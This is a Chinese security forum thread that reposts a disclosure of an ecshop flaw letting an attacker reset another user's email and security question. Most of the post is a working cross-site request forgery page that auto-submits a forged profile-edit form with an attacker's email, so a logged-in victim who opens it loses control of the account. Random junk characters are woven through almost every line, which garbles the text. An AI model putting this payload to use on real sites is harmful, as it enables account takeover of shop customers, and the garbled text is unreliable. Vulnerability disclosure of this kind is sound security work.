找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2095|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
1 Z3 w2 P. j# o: `( g4 Kecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
3 B1 \8 E6 |0 y5 b( o# Q( A
6 ~  w! J' v# o; s" f; N0 ~Demo For:http://www.wooyun.org/bug.php?action=view&id=395$ P& V( O( K1 p0 M7 d

" l7 w4 E- i& s详细说明:3 y3 _; {# x" |* o! m
利用csrf和xss可以突破官方所说的“障碍”. v/ N0 C, y% e: t3 E3 ~
xss版本已经有人说明
3 O) C7 B% z  z- |这里给出csrf版本# [+ M& K* K7 f& `" e% ^! Z

0 y# L2 P/ J( q6 F6 w; Z漏洞证明:/ k$ M( L; a& j1 s$ O" N
<html>
0 ^0 @+ n, Y1 T1 u6 \7 c<body>3 L/ ?0 e9 m1 i- y9 t
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">; ]& L  O- n# Z+ s
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
9 \/ m" D4 q: D# w" i9 B" @<INPUT TYPE="text" NAME="act" value="act_edit_profile">" J3 O- u) l' c) K5 ~' n  m
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
4 m2 P9 K: D+ C- S. i! }5 m<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
, \' L' ]" |; @+ ?$ _0 _) q</body>. ?# Q5 f4 o9 B% }7 q( [2 S& N
<script>! j0 \) D8 D5 v$ `! ~
document.forms[0].submit();
9 x; ^: X; P! g2 j5 t</script>  ]  t  O+ \! L) x( H2 T4 G
</html>
1 H  E$ A4 ^9 d! Q8 b& x- I构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失: v: J8 C5 |  M! M& D3 |
; A2 x$ }) g5 @7 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表